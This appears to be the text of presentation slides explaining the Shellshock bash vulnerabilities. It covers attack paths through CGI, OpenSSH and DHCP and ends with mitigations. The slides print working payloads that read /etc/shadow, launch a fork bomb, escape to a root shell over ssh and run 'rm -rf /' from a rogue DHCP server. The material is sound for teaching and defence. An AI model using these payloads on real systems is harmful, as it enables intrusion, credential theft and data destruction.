CVE-2014-6271 CVE-2014-7169 "shellshock" 

• Who does it impact? Bash 1.13 to 4.3. If you installed bash from between 1992 to now. • Where is bash used? 

What's the attack? Define a function within an environment variable, whatever you place after will be executed. foo () { ignored; }; my attack code goes here. env bar='() { :; }; echo vulnerable' bash -c 'echo hello world' Output; vulnerable hello world 

Common Gateway to Hell • Any calls to cgi (common gateway interface) services pass http client header variables as environment variables. Such as "user-agent”, or “referer”. • User-agent switcher for Chrome; () { :; }; (){ :|: & };: • Nameless major vendor; () { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/shadow 

People are already mass scanning 209.126.230.72 - - [24/Sep/2014:23:53:34 -0300] "GET / HTTP/1.0" 200 12761 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/ 2014/09/bash-shellshock-scan-of-internet.html)“ 

OpenSSH isn't safe • From sshd_config: # Allow client to pass locale environment variables AcceptEnv LANG LC_* • This means ForceCommand can be escaped $ env LC_NINJA='() { :; }; /bin/sh' ssh victimhost • SSH_ORIGINAL_COMMAND is set anyways $ ssh victimhost '() { :; }; /bin/sh' • You use "internal-sftp" right? • Why do we care about ForceCommand? 

DHCP • dhcpcd/dhclient makes system() calls • Rogue DHCP servers can execute arbitrary commands on hosts (usually as uid=0) /etc/dhcp/dhcpd.conf: option default-url "() { :; }; rm -rf /"; • Consider using "ip dhcp snooping vlan 100,110,115,...” 

Et tu, Mac OS X? • Bash 3.2.51 is installed at /bin/sh • Can be leveraged to get root, suid anyone? • Apple dhcp client does not use system() calls 

What have we learned? 

What should we have learned? • Widely deployed OSS software should be audited, especially if old • Often they are, but not by nice people • Data received from untrusted sources should be sanitized, before used • Switch default shell? /bin/sh -> dash or tcsh • Disable function importing by default?